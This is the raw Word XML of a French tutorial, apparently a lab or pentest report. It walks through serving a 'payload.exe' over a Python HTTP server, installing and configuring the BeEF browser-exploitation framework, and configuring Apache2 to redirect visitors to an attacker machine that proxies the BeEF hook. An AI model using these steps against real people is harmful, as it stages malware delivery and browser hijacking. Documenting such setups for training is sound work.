    <w:p w14:paraId="144B15A3" w14:textId="3C96238D" w:rsidR="00087C41" w:rsidRDefault="00426C00" w:rsidP="00087C41">
      <w:r>
        <w:t xml:space="preserve">Après la création du </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A70C19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, nous nous plaçons sur le dossier ou est contenu notre payload.exe et nous lançons un server http via python sur le port 8080 via la commande :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17ABE9AD" w14:textId="11AE087F" w:rsidR="00426C00" w:rsidRPr="003F382E" w:rsidRDefault="00426C00" w:rsidP="00426C00">
      <w:pPr>
        <w:pStyle w:val="CLI"/>
      </w:pPr>
      <w:r w:rsidRPr="00426C00">
        <w:t xml:space="preserve">python3 -m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00426C00">
        <w:t>http.server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00426C00">
        <w:t xml:space="preserve"> 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0457025B" w14:textId="77777777" w:rsidR="00087C41" w:rsidRDefault="00087C41" w:rsidP="00087C41"/>
    <w:p w14:paraId="3AAB10D2" w14:textId="77777777" w:rsidR="00426C00" w:rsidRDefault="00426C00" w:rsidP="00087C41"/>
    <w:p w14:paraId="55A470C5" w14:textId="77777777" w:rsidR="00930EB0" w:rsidRDefault="00930EB0" w:rsidP="00087C41"/>
    <w:p w14:paraId="27B2F55E" w14:textId="77777777" w:rsidR="00930EB0" w:rsidRDefault="00930EB0" w:rsidP="00087C41"/>
    <w:p w14:paraId="7C16A6D6" w14:textId="77777777" w:rsidR="00930EB0" w:rsidRDefault="00930EB0" w:rsidP="00087C41"/>
    <w:p w14:paraId="1A89F121" w14:textId="77777777" w:rsidR="00930EB0" w:rsidRDefault="00930EB0" w:rsidP="00087C41"/>
    <w:p w14:paraId="1752391F" w14:textId="77777777" w:rsidR="00930EB0" w:rsidRDefault="00930EB0" w:rsidP="00087C41"/>
    <w:p w14:paraId="3BCABBC6" w14:textId="77777777" w:rsidR="00930EB0" w:rsidRDefault="00930EB0" w:rsidP="00087C41"/>
    <w:p w14:paraId="0DB25E7A" w14:textId="1B200DFC" w:rsidR="00930EB0" w:rsidRDefault="00930EB0" w:rsidP="00930EB0">
      <w:pPr>
        <w:pStyle w:val="EFmoduletitre"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc133586233"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Paramétrage de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Beef</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Framework</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="61B49CE2" w14:textId="619B9392" w:rsidR="00930EB0" w:rsidRDefault="00930EB0" w:rsidP="00930EB0">
      <w:pPr>
        <w:pStyle w:val="EFtiquette"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc133586234"/>
      <w:r>
        <w:t>Installation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="0393AD65" w14:textId="54327741" w:rsidR="00930EB0" w:rsidRDefault="00930EB0" w:rsidP="00930EB0">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Pour installer </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A70C19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Beef</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A70C19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Framework</w:t>
      </w:r>
      <w:r>
        <w:t>, nous faisons comme suis :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EB9E39" w14:textId="77777777" w:rsidR="00930EB0" w:rsidRPr="00930EB0" w:rsidRDefault="00930EB0" w:rsidP="00930EB0">
      <w:pPr>
        <w:pStyle w:val="CLI"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00930EB0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>git clone https://github.com/beefproject/beef</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E21F003" w14:textId="77777777" w:rsidR="00930EB0" w:rsidRPr="00930EB0" w:rsidRDefault="00930EB0" w:rsidP="00930EB0">
      <w:pPr>
        <w:pStyle w:val="CLI"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00930EB0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cd beef</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0613C633" w14:textId="37016DDF" w:rsidR="00930EB0" w:rsidRPr="00930EB0" w:rsidRDefault="00930EB0" w:rsidP="00930EB0">
      <w:pPr>
        <w:pStyle w:val="CLI"/>
      </w:pPr>
      <w:r>
        <w:t>./</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>install</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1F04E0AA" w14:textId="77777777" w:rsidR="00930EB0" w:rsidRDefault="00930EB0" w:rsidP="00087C41"/>
    <w:p w14:paraId="18B0E49A" w14:textId="52362E0C" w:rsidR="00930EB0" w:rsidRDefault="00930EB0" w:rsidP="00930EB0">
      <w:pPr>
        <w:pStyle w:val="EFtiquette"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc133586235"/>
      <w:r>
        <w:t>Paramétrage</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="0A1D3133" w14:textId="49BBAA42" w:rsidR="00930EB0" w:rsidRDefault="00930EB0" w:rsidP="00930EB0">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Avant de lancer </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A70C19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Beef</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A70C19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Framework</w:t>
      </w:r>
      <w:r>
        <w:t>, nous devons paramétrer le fichier de configuration pour modifier les informations d’identifications par défaut</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DE9176" w14:textId="4384A419" w:rsidR="00930EB0" w:rsidRDefault="00930EB0" w:rsidP="00930EB0">
      <w:pPr>
        <w:pStyle w:val="CLI"/>
      </w:pPr>
      <w:r w:rsidRPr="00930EB0">
        <w:t xml:space="preserve">nano </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00930EB0">
        <w:t>config.yaml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7FEFC672" w14:textId="72F7BD4A" w:rsidR="00930EB0" w:rsidRPr="00930EB0" w:rsidRDefault="00930EB0" w:rsidP="00087C41">
      <w:r>
        <w:t xml:space="preserve">Et nous modifions les informations </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">user </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">et </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>passwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF65238" w14:textId="0523176C" w:rsidR="006A767C" w:rsidRDefault="006A767C" w:rsidP="006A767C">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4FE76A58" wp14:editId="766E7176">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>806087</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2021205</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1259840" cy="116840"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="59" name="Rectangle 59"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1259840" cy="116840"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">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D123C00" id="Rectangle 59" o:spid="_x0000_s1026" style="position:absolute;margin-left:63.45pt;margin-top:159.15pt;width:99.2pt;height:9.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" fillcolor="black [3213]" stroked="f" strokeweight="2pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00930EB0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40599923" wp14:editId="16700478">
            <wp:extent cx="5759450" cy="3709035"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="58" name="Picture 5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3709035"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E721CFB" w14:textId="77777777" w:rsidR="00930EB0" w:rsidRDefault="00930EB0" w:rsidP="00087C41"/>
    <w:p w14:paraId="4712D112" w14:textId="77777777" w:rsidR="006A767C" w:rsidRDefault="006A767C" w:rsidP="00087C41"/>
    <w:p w14:paraId="4E7D7879" w14:textId="77777777" w:rsidR="006A767C" w:rsidRDefault="006A767C" w:rsidP="00087C41"/>
    <w:p w14:paraId="66C00531" w14:textId="77777777" w:rsidR="006A767C" w:rsidRDefault="006A767C" w:rsidP="00087C41"/>
    <w:p w14:paraId="69B70EC8" w14:textId="77777777" w:rsidR="006A767C" w:rsidRDefault="006A767C" w:rsidP="00087C41"/>
    <w:p w14:paraId="678EEF19" w14:textId="77777777" w:rsidR="006A767C" w:rsidRDefault="006A767C" w:rsidP="00087C41"/>
    <w:p w14:paraId="1C1EB9BA" w14:textId="77777777" w:rsidR="006A767C" w:rsidRDefault="006A767C" w:rsidP="00087C41"/>
    <w:p w14:paraId="4759609F" w14:textId="77777777" w:rsidR="006A767C" w:rsidRDefault="006A767C" w:rsidP="00087C41"/>
    <w:p w14:paraId="5F80A568" w14:textId="77777777" w:rsidR="006A767C" w:rsidRDefault="006A767C" w:rsidP="00087C41"/>
    <w:p w14:paraId="4B919514" w14:textId="77777777" w:rsidR="006A767C" w:rsidRDefault="006A767C" w:rsidP="00087C41"/>
    <w:p w14:paraId="4562C06A" w14:textId="55F215C2" w:rsidR="00930EB0" w:rsidRDefault="006A767C" w:rsidP="006A767C">
      <w:pPr>
        <w:pStyle w:val="EFtiquette"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc133586236"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Lancement de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Beef</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Framework</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="19D240A7" w14:textId="3E346BB0" w:rsidR="006A767C" w:rsidRDefault="006A767C" w:rsidP="006A767C">
      <w:pPr>
        <w:pStyle w:val="CLI"/>
      </w:pPr>
      <w:r w:rsidRPr="006A767C">
        <w:t>./</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006A767C">
        <w:t>beef</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5895689E" w14:textId="19EA557A" w:rsidR="006A767C" w:rsidRDefault="006A767C" w:rsidP="00087C41">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Une fois lancer, le résultat doit ressembler à l’image ci-dessous, on note une url qui nous intéresse pour contrôler Beef Framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C83C3C3" w14:textId="7F436C0F" w:rsidR="00930EB0" w:rsidRDefault="006A767C" w:rsidP="00087C41">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71E25B67" wp14:editId="7E34909D">
            <wp:extent cx="5759450" cy="3675380"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="60" name="Picture 6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ex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3675380"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED424BA" w14:textId="77777777" w:rsidR="00930EB0" w:rsidRDefault="00930EB0" w:rsidP="00087C41"/>
    <w:p w14:paraId="1FDBCE08" w14:textId="486FDF9F" w:rsidR="006A767C" w:rsidRDefault="006A767C" w:rsidP="00087C41">
      <w:r>
        <w:t xml:space="preserve">On suit ce lien et on tombe sur le page de connexion </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798CE20D" w14:textId="5B6C38D3" w:rsidR="006A767C" w:rsidRDefault="006A767C" w:rsidP="006A767C">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27BB1BAE" wp14:editId="07DCA6D1">
            <wp:extent cx="4920457" cy="2889885"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="61" name="Picture 6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application&#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25845" cy="2893049"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4FE5DF" w14:textId="77777777" w:rsidR="006A767C" w:rsidRDefault="006A767C" w:rsidP="006A767C">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AA17B99" w14:textId="77777777" w:rsidR="006A767C" w:rsidRDefault="006A767C" w:rsidP="006A767C">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36F853C7" w14:textId="77777777" w:rsidR="006A767C" w:rsidRDefault="006A767C" w:rsidP="006A767C">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11B0E188" w14:textId="6DADC006" w:rsidR="006A767C" w:rsidRDefault="006A767C" w:rsidP="006A767C">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>On entre nous informations paramétrées plus tôt et on arrive sur la page d’accueil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7504CD02" w14:textId="3247299A" w:rsidR="006A767C" w:rsidRDefault="006A767C" w:rsidP="006A767C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6F13C020" wp14:editId="7451CA31">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2223770</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1386280</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="134471" cy="76200"/>
                <wp:effectExtent l="0" t="0" r="18415" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="63" name="Rectangle 63"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="134471" cy="76200"/>
                        </a:xfrm>
                        <a:prstGeom prst="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9D05673" id="Rectangle 63" o:spid="_x0000_s1026" style="position:absolute;margin-left:175.1pt;margin-top:109.15pt;width:10.6pt;height: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" filled="f" strokecolor="red" strokeweight=".25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B0A8F75" wp14:editId="5633BD1C">
            <wp:extent cx="6096096" cy="3185160"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="62" name="Picture 6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 application&#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6288" cy="3185260"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="27084F3F" w14:textId="77777777" w:rsidR="006A767C" w:rsidRDefault="006A767C" w:rsidP="00087C41"/>
    <w:p w14:paraId="7DEC3815" w14:textId="6083D811" w:rsidR="006A767C" w:rsidRDefault="006A767C" w:rsidP="00087C41">
      <w:r>
        <w:t xml:space="preserve">Nous copions le lien de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>l’hypertext</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> encadrer en rouge dans l’image car nous allons en avoir besoin pour le point suivant concernant la redirection avec Apache.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122C7156" w14:textId="77777777" w:rsidR="006A767C" w:rsidRDefault="006A767C" w:rsidP="00087C41"/>
    <w:p w14:paraId="335F698B" w14:textId="77777777" w:rsidR="00930EB0" w:rsidRDefault="00930EB0" w:rsidP="00087C41"/>
    <w:p w14:paraId="1B3E801B" w14:textId="52A9EDF0" w:rsidR="00930EB0" w:rsidRDefault="00930EB0" w:rsidP="00930EB0">
      <w:pPr>
        <w:pStyle w:val="EFmoduletitre"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc133586237"/>
      <w:r>
        <w:t>Paramétrage de la redirection Apache2</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="0AA73F16" w14:textId="5FFA53D0" w:rsidR="00930EB0" w:rsidRDefault="00930EB0" w:rsidP="00930EB0">
      <w:pPr>
        <w:pStyle w:val="EFtiquette"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc133586238"/>
      <w:r>
        <w:t>Installation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22788602" w14:textId="098A9E94" w:rsidR="00930EB0" w:rsidRDefault="00930EB0" w:rsidP="00930EB0">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r>
        <w:t>Si Apache</w:t>
      </w:r>
      <w:r w:rsidR="00A70C19">
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> n’est pas installé sur votre système, l’installer via la commande suivante :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D13B14" w14:textId="3EA99716" w:rsidR="00930EB0" w:rsidRPr="00930EB0" w:rsidRDefault="00930EB0" w:rsidP="00930EB0">
      <w:pPr>
        <w:pStyle w:val="CLI"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00930EB0">
        <w:t>apt-install</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00930EB0">
        <w:t xml:space="preserve"> apache2 -y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D325026" w14:textId="77777777" w:rsidR="00426C00" w:rsidRDefault="00426C00" w:rsidP="00087C41"/>
    <w:p w14:paraId="3D2C521B" w14:textId="2F14D974" w:rsidR="00426C00" w:rsidRDefault="00930EB0" w:rsidP="00930EB0">
      <w:pPr>
        <w:pStyle w:val="EFtiquette"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc133586239"/>
      <w:r>
        <w:t>Configuration</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="4ACEB499" w14:textId="608185F6" w:rsidR="00930EB0" w:rsidRPr="00C40706" w:rsidRDefault="00930EB0" w:rsidP="00C40706">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r w:rsidRPr="00C40706">
        <w:t>En premier nous activons les modules nécessaire</w:t>
      </w:r>
      <w:r w:rsidR="00C40706">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00C40706">
        <w:t> :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0396618E" w14:textId="500E33A0" w:rsidR="00930EB0" w:rsidRPr="00930EB0" w:rsidRDefault="00930EB0" w:rsidP="00930EB0">
      <w:pPr>
        <w:pStyle w:val="CLI"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00930EB0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">a2enmod proxy </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00930EB0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>proxy_http</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00930EB0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00930EB0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>proxy_balancer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00930EB0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00930EB0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lbmethod_byrequests</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="17046A88" w14:textId="77777777" w:rsidR="00426C00" w:rsidRPr="00930EB0" w:rsidRDefault="00426C00" w:rsidP="00087C41">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="231F75A0" w14:textId="385C9255" w:rsidR="00426C00" w:rsidRDefault="00930EB0" w:rsidP="00087C41">
      <w:r w:rsidRPr="00930EB0">
        <w:t>Puis nous éditons le fichier de configuration</w:t>
      </w:r>
      <w:r>
        <w:t> :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8C4C8B" w14:textId="676EBDC8" w:rsidR="00930EB0" w:rsidRPr="00930EB0" w:rsidRDefault="00930EB0" w:rsidP="00930EB0">
      <w:pPr>
        <w:pStyle w:val="CLI"/>
      </w:pPr>
      <w:r w:rsidRPr="00930EB0">
        <w:t>nano /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00930EB0">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00930EB0">
        <w:t>/apache2/sites-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00930EB0">
        <w:t>available</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00930EB0">
        <w:t>/000-default.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674AF0EA" w14:textId="1A8AD5F9" w:rsidR="00426C00" w:rsidRDefault="00930EB0" w:rsidP="00087C41">
      <w:r>
        <w:t>Nous commentons toutes les lignes non commentées et ajoutons au début les lignes suivantes :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A434821" w14:textId="2D0BBB67" w:rsidR="00930EB0" w:rsidRDefault="00930EB0" w:rsidP="00930EB0">
      <w:pPr>
        <w:pStyle w:val="CLI"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Redirect</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> / lien http de votre machine d’attaque/r</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47177165" w14:textId="77777777" w:rsidR="00930EB0" w:rsidRDefault="00930EB0" w:rsidP="00930EB0">
      <w:pPr>
        <w:pStyle w:val="CLI"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CA097F2" w14:textId="10CD8182" w:rsidR="00930EB0" w:rsidRDefault="00930EB0" w:rsidP="00930EB0">
      <w:pPr>
        <w:pStyle w:val="CLI"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ProxyPreserveHost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> on</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650F45CE" w14:textId="797B8017" w:rsidR="00930EB0" w:rsidRDefault="00930EB0" w:rsidP="00930EB0">
      <w:pPr>
        <w:pStyle w:val="CLI"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ProxyPass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /r lien vers le site </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>beef</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> copier plus tôt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212DDE3C" w14:textId="429E3DF3" w:rsidR="00930EB0" w:rsidRDefault="00930EB0" w:rsidP="00930EB0">
      <w:pPr>
        <w:pStyle w:val="CLI"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ProxyPassReverse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /r lien vers le site </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>beef</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> copier plus tôt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F32E5DD" w14:textId="3FCB74CA" w:rsidR="00930EB0" w:rsidRPr="00930EB0" w:rsidRDefault="00930EB0" w:rsidP="00930EB0">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
